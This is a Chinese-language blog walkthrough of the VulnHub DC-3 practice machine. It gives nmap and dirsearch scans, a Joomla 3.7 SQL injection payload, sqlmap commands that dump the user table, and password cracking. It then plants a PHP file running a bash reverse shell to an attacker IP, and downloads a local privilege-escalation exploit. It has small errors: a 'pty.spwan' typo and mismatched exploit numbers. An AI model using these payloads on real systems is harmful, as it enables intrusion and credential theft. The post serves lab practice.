DC-3

准备工作

在vulnhub官网下载DC:3靶机DC-3

信息收集

nmap -A -T4 -p - 192.168.1.13


发现80端口开放 访问

然后对目录进行扫描

dirsearch -u  http://192.168.1.13

image.png
访问发现 REDME.txt image.png
发现是Jomal 3.7 搜索后发现该CMS存在SQL注入漏洞

漏洞利用

Payload:/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)


可用,接下来就是用SQLmap跑

sqlmap -u "http://192.168.1.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -Tables


查询 users中的字段

sqlmap -u "http://192.168.1.13/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]

得到用户名和密码,但是密码加密方式未知,尝试使用工具John the Ripper破解

成功破解
之前有扫描到后台地址 登录一下

在经过一顿翻找后找到上传点。

这处地方可以新建文件,

然后使用蚁剑连接

新建一个PHP文件,访问就会反弹shell,攻击机先进行监听
内容为

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.179.128/4444 0>&1' ");
?>

image.png
已经成功获取

使用python反弹shell
python -c 'import pty; pty.spwan("/bin/bash")'

查看系统版本
cat /etc/issue
或者 uname -a

搜索有什么漏洞

对比搜索引擎搜索该版本漏洞,锁定path为39773.txt的漏洞。查看该文件路径
复制到当前目录并查看

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /tmp


下载exp到本地
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

然后用蚁剑上传到目标机器

对压缩包进行解压

   unzip 39772.zip
   tar -xvf exploit.tar

image.png
运行脚本
image.png
提权成功
image.png
获得flag

posted @ 2022-05-19 08:22  vir-k  阅读(167)  评论(0编辑  收藏  举报